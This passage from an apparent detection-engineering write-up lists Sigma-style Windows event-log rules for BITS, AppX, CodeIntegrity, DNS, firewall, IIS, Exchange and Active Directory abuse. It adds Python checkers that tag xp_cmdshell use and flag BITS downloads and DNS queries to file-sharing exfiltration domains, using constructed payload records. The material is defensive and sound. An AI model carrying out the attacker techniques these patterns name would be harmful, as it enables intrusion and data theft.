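PROCOPTION_RE = re.compile(r"\bsp_procoption\b", re.I)
# sp_configure 'xp_cmdshell', N  (optionally N'...' unicode literal) toggles the option.
CMDSHELL_OPTION_RE = re.compile(r"\bsp_configure\b\s*N?'xp_cmdshell'", re.I)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)


def classify_tsql(statement):
    """Return the rule-style tags that fire for one T-SQL statement."""
    tags = []
    if SYSADMIN_RE.search(statement):
        tags.append("sysadmin_role_added")
    if AUDIT_RE.search(statement):
        tags.append("server_audit_altered_or_dropped")
    if PROCOPTION_RE.search(statement):
        tags.append("startup_procedure_changed")
    # Check the option change first so that enabling xp_cmdshell is not
    # mis-reported as executing it; any other mention is treated as execution.
    if CMDSHELL_OPTION_RE.search(statement):
        tags.append("xp_cmdshell_option_changed")
    elif CMDSHELL_RE.search(statement):
        tags.append("xp_cmdshell_executed")
    return tags


def classify_all(statements):
    """Map each statement to its tags, keeping the input order."""
    return [classify_tsql(s) for s in statements]


if __name__ == "__main__":
    for stmt, tags in zip(SAMPLE_STATEMENTS, classify_all(SAMPLE_STATEMENTS)):
        print(f"{','.join(tags) or '-':<32} {stmt}")
```

In a real deployment the option-change and execution tags deserve different severities: the option change is the persistence or setup step and is rare on a hardened server, while xp_cmdshell execution is the moment commands actually run under the SQL Server service account.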
Relevant Anti-Virus Signature Keywords In Application Log Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords. https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31, https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed, https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01, https://www.nextron-systems.com/?s=antivirus
Remote Access Tool - ScreenConnect Command Execution Detects command execution via ScreenConnect RMM https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467
Remote Access Tool - ScreenConnect File Transfer Detects file being transferred via ScreenConnect RMM https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467
Microsoft Malware Protection Engine Crash - WER This rule detects a suspicious crash of the Microsoft Malware Protection Engine https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344
File Was Not Allowed To Run Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker, https://nxlog.co/documentation/nxlog-user-guide/applocker.html
Sysinternals Tools AppX Versions Execution Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths Internal Research
Deployment AppX Package Was Blocked By AppLocker Detects an appx package deployment that was blocked by AppLocker policy https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
Potential Malicious AppX Package Installation Attempts Detects potential installation or installation attempts of known malicious appx packages https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/
Deployment Of The AppX Package Was Blocked By The Policy Detects an appx package deployment that was blocked by the local computer policy https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
Suspicious AppX Package Installation Attempt Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious Remote AppX Package Locations Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain. Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious AppX Package Locations Detects an appx package added to the pipeline of the "to be processed" packages which is located in a suspicious location Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Uncommon AppX Package Locations Detects an appx package added to the pipeline of the "to be processed" packages which is located in an uncommon location Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious Digital Signature Of AppX Package Detects execution of AppX packages with known suspicious or malicious signature Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
New BITS Job Created Via Bitsadmin Detects the creation of a new bits job by Bitsadmin https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
New BITS Job Created Via PowerShell Detects the creation of a new bits job by PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
BITS Transfer Job Downloading File Potential Suspicious Extension Detects new BITS transfer job saving local files with potential suspicious extensions https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
BITS Transfer Job Download From File Sharing Domains Detects BITS transfer job downloading files from a file sharing domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
BITS Transfer Job Download From Direct IP Detects a BITS transfer job downloading file(s) from a direct IP address. https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
BITS Transfer Job With Uncommon Or Suspicious Remote TLD Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832
BITS Transfer Job Download To Potential Suspicious Folder Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
Certificate Private Key Acquired Detects when an application acquires a certificate private key https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Certificate Exported From Local Certificate Store Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation. https://twitter.com/SBousseaden/status/1483810148602814466, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations
CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked Detects block events for files that are disallowed by code integrity for protected processes https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Blocked Image/Driver Load For Policy Violation Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. https://twitter.com/wdormann/status/1590434950335320065, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations
CodeIntegrity - Blocked Driver Load With Revoked Certificate Detects blocked load attempts of revoked drivers https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Revoked Kernel Driver Loaded Detects the load of a revoked kernel driver https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Blocked Image Load With Revoked Certificate Detects blocked image load events with revoked certificates by code integrity. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Revoked Image Loaded Detects image load events with revoked certificates by code integrity. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unsigned Kernel Module Loaded Detects the presence of a loaded unsigned kernel module on the system. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unsigned Image Loaded Detects loaded unsigned image on the system https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module Detects loaded kernel modules that did not meet the WHQL signing requirements. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
Loading Diagcab Package From Remote Path Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability https://twitter.com/nas_bench/status/1539679555908141061, https://twitter.com/j00sean/status/1537750439701225472
DNS Query for Anonfiles.com Domain - DNS Client Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
DNS Query To MEGA Hosting Website - DNS Client Detects DNS queries for subdomains related to MEGA sharing website https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
DNS Query To Put.io - DNS Client Detects DNS queries for subdomains related to "Put.io" sharing website. https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure
Query Tor Onion Address - DNS Client Detects DNS resolution of an .onion address related to Tor routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
DNS Query To Ufile.io - DNS Client Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration https://thedfirreport.com/2021/12/13/diavol-ransomware/
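As an added example that serves two groups of rules above, the BITS transfer job rules (suspicious local extension, file-sharing domain, direct IP, uncommon remote TLD, suspicious local folder) and the DNS client rules for file-sharing domains and .onion addresses, the following Python snippet (mine, not the report's or SigmaHQ's) evaluates constructed BITS job records and DNS query names against those checks. It assumes BITS job records expose the remote URL as "RemoteName" and the destination path as "LocalName"; the extension, domain, TLD and folder lists are short illustrative choices of my own, not the rules' full lists, and every record below is constructed.

```python
import ipaddress
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Constructed BITS job records; field names are an assumption about the schema.
SAMPLE_BITS_EVENTS = [
    {"RemoteName": "https://download.windowsupdate.com/c/update.cab",
     "LocalName": "C:\\Windows\\SoftwareDistribution\\Download\\update.cab"},
    {"RemoteName": "https://anonfiles.com/abc123/payload",
     "LocalName": "C:\\Users\\Public\\payload.exe"},
    {"RemoteName": "http://203.0.113.10:8080/stage.dll",
     "LocalName": "C:\\Windows\\Temp\\stage.dll"},
    {"RemoteName": "https://cdn.example.xyz/installer.msi",
     "LocalName": "C:\\Users\\alice\\AppData\\Local\\Temp\\installer.msi"},
]

# Illustrative lists; extend from your own telemetry.
SUSPICIOUS_EXT = {".exe", ".dll", ".ps1", ".vbs", ".bat", ".hta", ".js", ".scr", ".lnk", ".iso"}
FILE_SHARING_DOMAINS = ("anonfiles.com", "mega.nz", "mega.co.nz", "put.io", "ufile.io", "transfer.sh")
COMMON_TLDS = {"com", "net", "org", "edu", "gov", "mil", "io", "de", "uk", "fr", "nl", "co", "us", "eu"}
SUSPICIOUS_FOLDERS = ("\\users\\public\\", "\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\perflogs\\")


def remote_host(remote_name):
    """Host part of the RemoteName URL, lower-cased (IPv6 literals lose their brackets)."""
    return (urlsplit(remote_name).hostname or "").lower()


def is_direct_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def matches_domain_list(name, domains):
    """True if name equals, or is a subdomain of, any entry in domains."""
    return any(name == d or name.endswith("." + d) for d in domains)


def check_bits_job(event):
    """Return the rule-style tags that fire for one BITS job record."""
    tags = []
    host = remote_host(event.get("RemoteName", ""))
    local = event.get("LocalName", "")
    if PureWindowsPath(local).suffix.lower() in SUSPICIOUS_EXT:
        tags.append("suspicious_extension")
    if matches_domain_list(host, FILE_SHARING_DOMAINS):
        tags.append("file_sharing_domain")
    if is_direct_ip(host):
        tags.append("direct_ip")
    elif host and host.rsplit(".", 1)[-1] not in COMMON_TLDS:
        # A TLD outside the allowlist is "uncommon"; IPs are handled above.
        tags.append("uncommon_tld")
    if any(folder in local.lower() for folder in SUSPICIOUS_FOLDERS):
        tags.append("suspicious_folder")
    return tags


def check_dns_query(query_name):
    """Apply the DNS-client checks to one queried name (trailing dot tolerated)."""
    q = query_name.lower().rstrip(".")
    tags = []
    if matches_domain_list(q, FILE_SHARING_DOMAINS):
        tags.append("file_sharing_domain")
    if q.endswith(".onion"):
        tags.append("tor_onion")
    return tags


if __name__ == "__main__":
    for ev in SAMPLE_BITS_EVENTS:
        print(check_bits_job(ev), ev["RemoteName"])
    for name in ("files.mega.nz.", "abcdefghijklmnop.onion", "www.microsoft.com"):
        print(check_dns_query(name), name)
```

Reusing one domain list for both the BITS and the DNS checks keeps the two detections consistent: a download that bypasses the BITS client (for example via a browser) still surfaces in the DNS telemetry, and the allowlist-of-TLDs approach for the "uncommon TLD" check is deliberate, since a blocklist of abused TLDs ages quickly.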
Suspicious Cobalt Strike DNS Beaconing - DNS Client Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
Failed DNS Zone Transfer Detects when a DNS zone transfer failed. https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp
DNS Server Error Failed Loading the ServerLevelPluginDLL Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx, https://twitter.com/gentilkiwi/status/861641945944391680
USB Device Plugged Detects plugged/unplugged USB devices https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/, https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
Uncommon New Firewall Rule Added In Windows Firewall Exception List Detects when a rule has been added to the Windows Firewall exception list https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10), https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule". https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
All Rules Have Been Deleted From The Windows Firewall Configuration Detects when all the rules have been deleted from the Windows Defender Firewall configuration https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
A Rule Has Been Deleted From The Windows Firewall Exception List Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
The Windows Defender Firewall Service Failed To Load Group Policy Detects activity when the Windows Defender Firewall service failed to load Group Policy https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Windows Defender Firewall Has Been Reset To Its Default Configuration Detects activity when Windows Defender Firewall has been reset to its default configuration https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Windows Firewall Settings Have Been Changed Detects activity when the settings of the Windows firewall have been changed https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
ETW Logging/Processing Option Disabled On IIS Server Detects changes to the IIS server configuration in order to disable/remove the ETW logging/processing option. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/
HTTP Logging Disabled On IIS Server Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging
New Module Added To IIS Server Detects the addition of a new module to an IIS server. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
Previously Installed IIS Module Was Removed Detects the removal of a previously installed IIS module. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
Potential Active Directory Reconnaissance/Enumeration Via LDAP Detects potential Active Directory enumeration via LDAP https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1, https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs, https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c, https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427, https://ipurple.team/2024/07/15/sharphound-detection/
Standard User In High Privileged Group Detects logons by standard users that are members of high-privileged groups such as the Administrators group https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers, https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml
ProxyLogon MSExchange OabVirtualDirectory Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
Mailbox Export to Exchange Webserver Detects a successful export of an Exchange mailbox to an untypical directory or with an aspx name suffix, which can be used to place a webshell, or the role assignment needed for it https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
Certificate Request Export to Exchange Webserver Detects a write of an Exchange CSR to an untypical directory or with an aspx name suffix, which can be used to place a webshell https://twitter.com/GossiTheDog/status/1429175908905127938
Remove Exported Mailbox from Exchange Webserver Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430
Exchange Set OabVirtualDirectory ExternalUrl Property Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log https://twitter.com/OTR_Community/status/1371053369071132675
MSExchange Transport Agent Installation - Builtin Detects the installation of an Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
Failed MSExchange Transport Agent Installation Detects a failed installation of an Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8
NTLM Logon Detects logons using NTLM, which could be caused by a legacy source or attackers https://twitter.com/JohnLaTwC/status/1004895028995477505
NTLM Brute Force Detects common NTLM brute force device names https://www.varonis.com/blog/investigate-ntlm-brute-force
Potential Remote Desktop Connection to Non-Domain Host Detects logons using NTLM to hosts that are potentially not part of the domain. n/a
OpenSSH Server Listening On Socket Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket. https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH, https://winaero.com/enable-openssh-server-windows-10/, https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse, https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx, https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Azure AD Health Monitoring Agent Registry Keys Access This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml
Azure AD Health Service Agents Registry Keys Access This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys. https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml
Powerview Add-DomainObjectAcl DCSync AD Extend Right Backdooring a domain object to grant the rights associated with DCSync to a regular user or machine account using the Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, which allows re-obtaining the password hashes of any user/computer https://twitter.com/menasec1/status/1111556090137903104, https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
AD Privileged Users or Groups Reconnaissance Detects privileged user or group reconnaissance based on event ID 4661 and known privileged user or group SIDs https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html
ADCS Certificate Template Configuration Vulnerability Detects certificate creation with template allowing risk permission subject https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
ADCS Certificate Template Configuration Vulnerability with Risky EKU Detects certificate creation with template allowing risk permission subject and risky EKU https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
Add or Remove Computer from DC Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743
Access To ADMIN$ Network Share Detects access to ADMIN$ network share https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140
AD Object WriteDAC Access Detects WRITE_DAC access to a domain object https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
Active Directory Replication from Non Machine Account Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
Potential AD User Enumeration From Non-Machine Account Detects read access to a domain user from a non-machine account https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf, http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html, https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662
Enabled User Right in AD to Control User Objects Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
Active Directory User Backdoors Detects scenarios where one can control another user's or computer's account without having to use their credentials. https://msdn.microsoft.com/en-us/library/cc220234.aspx, https://adsecurity.org/?p=3466, https://blog.harmj0y.net/redteaming/another-word-on-delegation/
Weak Encryption Enabled and Kerberoast Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. https://adsecurity.org/?p=2053, https://blog.harmj0y.net/redteaming/another-word-on-delegation/
Hacktool Ruler Detects events that are generated when using the hacktool Ruler by Sensepost https://github.com/sensepost/ruler, https://github.com/sensepost/ruler/issues/47, https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624
Remote Task Creation via ATSVC Named Pipe Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
